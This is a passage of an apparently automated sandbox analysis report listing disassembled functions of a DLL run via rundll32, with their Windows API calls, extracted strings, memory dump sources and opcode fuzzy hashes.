                                                                                                          • Instruction Fuzzy Hash: F611C171A01228EBEB10DBA5DD89FAE7BB8FF05781F400015FA05E61C1DB709D01CBA4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1001E790, Relevance: 13.6, APIs: 9, Instructions: 105windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 1001E7D5
                                                                                                          • SendMessageA.USER32(?,000000B1,?,?), ref: 1001E7FB
                                                                                                          • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 1001E815
                                                                                                          • SendMessageA.USER32(?,000000C2,00000000,?), ref: 1001E839
                                                                                                          • SendMessageA.USER32(?,000000B1,00000000,?), ref: 1001E86E
                                                                                                          • SendMessageA.USER32(00000000,000000B7,00000000,00000000), ref: 1001E888
                                                                                                          • SendMessageA.USER32(?,000000C2,00000000,1004B96C), ref: 1001E8A4
                                                                                                          • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 1001E8BD
                                                                                                          • SendMessageA.USER32(?,000000B6,00000000,?), ref: 1001E8DB
                                                                                                            • Part of subcall function 1001E520: _strlen.LIBCMT ref: 1001E5FA
                                                                                                            • Part of subcall function 1001E520: _strlen.LIBCMT ref: 1001E614
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$_strlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3697954797-0
                                                                                                          • Opcode ID: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
                                                                                                          • Instruction ID: 0edfc11e8551d9ebf0957f65f3a3322fb23760369c1f09792b2f79df2d73aaf8
                                                                                                          • Opcode Fuzzy Hash: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
                                                                                                          • Instruction Fuzzy Hash: 22413A74F00306ABE704CF94CD85FAEB7B5FB88B41F208159FA19AB291C670A941DB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002AF6B, Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 1002AF72
                                                                                                          • EnterCriticalSection.KERNEL32(?,00000010,1002B13B,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461), ref: 1002AF83
                                                                                                          • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002AFA1
                                                                                                          • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AFD5
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041
                                                                                                          • _memset.LIBCMT ref: 1002B060
                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1891723912-0
                                                                                                          • Opcode ID: 26dcec1041afacb20883f8a88d8399bfa0257013ec7d92cf10d39ecfaabb8d94
                                                                                                          • Instruction ID: 31172aa3a9d6c7229b9057958b552749f74c39a7ca69aeefdb4b4ffe67e485c6
                                                                                                          • Opcode Fuzzy Hash: 26dcec1041afacb20883f8a88d8399bfa0257013ec7d92cf10d39ecfaabb8d94
                                                                                                          • Instruction Fuzzy Hash: 2431BCB4400A16EFDB25DF64ECC5C5ABBB4FF05310BA1C529E96A97661CB30AD90CF80
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10001920, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10001982
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw
                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                          • API String ID: 2005118841-1866435925
                                                                                                          • Opcode ID: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
                                                                                                          • Instruction ID: 1c38ab3b2c14ee1c247bdf225933c46791fcea5bd7c47801f16d03e79e27f587
                                                                                                          • Opcode Fuzzy Hash: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
                                                                                                          • Instruction Fuzzy Hash: 29518A34904688EEDB14DFA0CC85BDDB7B1EF45300F6081ADE5056B285CBB46E85CF91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10021F51, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115threadwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 10021E9F: GetParent.USER32(00000000), ref: 10021EF3
                                                                                                            • Part of subcall function 10021E9F: GetLastActivePopup.USER32(00000000), ref: 10021F04
                                                                                                            • Part of subcall function 10021E9F: IsWindowEnabled.USER32(00000000), ref: 10021F18
                                                                                                            • Part of subcall function 10021E9F: EnableWindow.USER32(00000000,00000000), ref: 10021F2B
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 10021F9E
                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 10021FB2
                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 10021FBC
                                                                                                          • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 10021FD4
                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002204E
                                                                                                          • EnableWindow.USER32(00000000,00000001), ref: 10022093
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1877664794-4108050209
                                                                                                          • Opcode ID: fa47c2bca283c1efa9c57a90baf6965e2cf2faf5ec170df8e895b8240d28c0a6
                                                                                                          • Instruction ID: c7e4dcc29fd9e1fd486e00497d35318e62f13d9d594050e36cf698265b5585c7
                                                                                                          • Opcode Fuzzy Hash: fa47c2bca283c1efa9c57a90baf6965e2cf2faf5ec170df8e895b8240d28c0a6
                                                                                                          • Instruction Fuzzy Hash: 7B41EF75A00228ABEB21CF64DC86BDA77B8FF14750F900599FA58D7281D7B09E80CF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002102D, Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GlobalLock.KERNEL32 ref: 1002104C
                                                                                                          • lstrcmpA.KERNEL32(?,?), ref: 10021058
                                                                                                          • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1002106A
                                                                                                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1002108A
                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10021092
                                                                                                          • GlobalLock.KERNEL32 ref: 1002109C
                                                                                                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100210A9
                                                                                                          • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 100210C1
                                                                                                            • Part of subcall function 1002A801: GlobalFlags.KERNEL32(?), ref: 1002A810
                                                                                                            • Part of subcall function 1002A801: GlobalUnlock.KERNEL32(?,?,?,?,10021A27,?,00000214,1000148F), ref: 1002A822
                                                                                                            • Part of subcall function 1002A801: GlobalFree.KERNEL32 ref: 1002A82D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 168474834-0
                                                                                                          • Opcode ID: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
                                                                                                          • Instruction ID: 1e26f6493bbdf61cc617228eadb58d3a13350607a0778397bdab265459f41c03
                                                                                                          • Opcode Fuzzy Hash: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
                                                                                                          • Instruction Fuzzy Hash: 6E11E079600640BBDB228BA5CD89DAFBAFDFB867407500529F605D2020DA72ED81DB64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A98E, Relevance: 12.0, APIs: 8, Instructions: 39COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A99D
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A9A4
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A9AB
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A9B5
                                                                                                          • GetDC.USER32(00000000), ref: 1002A9BF
                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 1002A9D0
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002A9D8
                                                                                                          • ReleaseDC.USER32 ref: 1002A9E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MetricsSystem$CapsDevice$Release
                                                                                                          • String ID:
                                                                                                          • API String ID: 1151147025-0
                                                                                                          • Opcode ID: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
                                                                                                          • Instruction ID: 4b18a5fc2a191a652713761d43d2b2da4b0cc28fbe92607e78cb1662e9ca01b2
                                                                                                          • Opcode Fuzzy Hash: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
                                                                                                          • Instruction Fuzzy Hash: 0CF0F9B1E40724BAF7105F728C89B167EA8FB49761F004456E6199B281DAB599118FD0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10001D60, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 136windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strlen$IconLoad_memset
                                                                                                          • String ID: ^t$127.0.0.1
                                                                                                          • API String ID: 858515944-3506571716
                                                                                                          • Opcode ID: b8f0a33aed5857d50bc6d4f51472f84c63fc56d9dccdc7a641a98e34b1a5589f
                                                                                                          • Instruction ID: cb70d14c711791ee52ee588ee2f9325bb7e7fa3515ba92e26f588566a221a80e
                                                                                                          • Opcode Fuzzy Hash: b8f0a33aed5857d50bc6d4f51472f84c63fc56d9dccdc7a641a98e34b1a5589f
                                                                                                          • Instruction Fuzzy Hash: AE5118B4904298DBDB14CFA4CC41B9EBBB1EF45308F6481A8E50DAB392DB356E85CF54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B84C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GlobalLock.KERNEL32 ref: 1002B878
                                                                                                          • lstrlenA.KERNEL32(?), ref: 1002B8C3
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002B8DD
                                                                                                          • _wcslen.LIBCMT ref: 1002B901
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
                                                                                                          • String ID: System
                                                                                                          • API String ID: 4253822919-3470857405
                                                                                                          • Opcode ID: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
                                                                                                          • Instruction ID: 7b5a175680f670ca79b6c2ec9272e95e82f354ff2106dbd97111df154043a3f4
                                                                                                          • Opcode Fuzzy Hash: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
                                                                                                          • Instruction Fuzzy Hash: C8412671D00619DFDB14CFA4DC85AAEBBB9FF04310F64812AE516EB285E770AD85CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100270BC, Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetParent.USER32(?), ref: 100270EF
                                                                                                          • PeekMessageA.USER32(00000024,00000000,00000000,00000000,00000000), ref: 10027113
                                                                                                          • UpdateWindow.USER32(?), ref: 1002712E
                                                                                                          • SendMessageA.USER32(?,00000121,00000000,?), ref: 1002714F
                                                                                                          • SendMessageA.USER32(?,0000036A,00000000,00000002), ref: 10027167
                                                                                                          • UpdateWindow.USER32(?), ref: 100271AA
                                                                                                          • PeekMessageA.USER32(00000024,00000000,00000000,00000000,00000000), ref: 100271DB
                                                                                                            • Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                          • String ID:
                                                                                                          • API String ID: 2853195852-0
                                                                                                          • Opcode ID: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
                                                                                                          • Instruction ID: e439185c47b7e5e34c348b8e0b3dbe5bb3c4b57b45cec7e657144295835a6737
                                                                                                          • Opcode Fuzzy Hash: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
                                                                                                          • Instruction Fuzzy Hash: 9041C370E00246EBDB11CF69DC84E9FBBF8FF82B81F90815DE949A2150D7719A50DB10
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10027676, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongWindow$MessageSend_memset
                                                                                                          • String ID: ,
                                                                                                          • API String ID: 2997958587-3772416878
                                                                                                          • Opcode ID: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
                                                                                                          • Instruction ID: f848ae84a4977e1a31b52bc52376e27e10e8709ed1b3efe9ee7841c93cdd6a05
                                                                                                          • Opcode Fuzzy Hash: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
                                                                                                          • Instruction Fuzzy Hash: 1431C134600B119FC715DF78E888A6AB7F5FF48350B92056DE58997691DB70E800CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002245E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 10022468
                                                                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1002254E
                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002256B
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1002258B
                                                                                                          • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 100225A6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseEnumH_prolog3_OpenQueryValue
                                                                                                          • String ID: Software\
                                                                                                          • API String ID: 1666054129-964853688
                                                                                                          • Opcode ID: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
                                                                                                          • Instruction ID: 3764a028f082780bf1b34d3e1a3aecc110f1b9c57831791e493d608046546682
                                                                                                          • Opcode Fuzzy Hash: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
                                                                                                          • Instruction Fuzzy Hash: 3C41AC35800128EBCB22DBA0CC81AEEB3B8FF49310F5045D9F249E2191DB34AB958F94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100222E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 100222EA
                                                                                                          • RegOpenKeyA.ADVAPI32(?,?,?), ref: 10022378
                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002239B
                                                                                                            • Part of subcall function 1002228B: __EH_prolog3.LIBCMT ref: 10022292
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnumH_prolog3H_prolog3_catch_Open
                                                                                                          • String ID: Software\Classes\
                                                                                                          • API String ID: 3518408925-1121929649
                                                                                                          • Opcode ID: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
                                                                                                          • Instruction ID: 704202dc6e21b2fa8b48efa6eea704b7fc6a1643c8ca87a9ade3220d51c06aab
                                                                                                          • Opcode Fuzzy Hash: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
                                                                                                          • Instruction Fuzzy Hash: A1317C36C00068EBDB22EBA4CD44BDDB6B8FB09350F5141D5F999A3252DA306FA49F91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B26C, Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCapture.USER32 ref: 1002B279
                                                                                                          • SendMessageA.USER32(?,00000365,00000000,00000000), ref: 1002B294
                                                                                                          • GetFocus.USER32 ref: 1002B2A9
                                                                                                          • SendMessageA.USER32(?,00000365,00000000,00000000), ref: 1002B2B7
                                                                                                          • GetLastActivePopup.USER32(?), ref: 1002B2E0
                                                                                                          • SendMessageA.USER32(?,00000365,00000000,00000000), ref: 1002B2ED
                                                                                                            • Part of subcall function 1002881E: GetWindowLongA.USER32 ref: 10028844
                                                                                                            • Part of subcall function 1002881E: GetParent.USER32(?), ref: 10028852
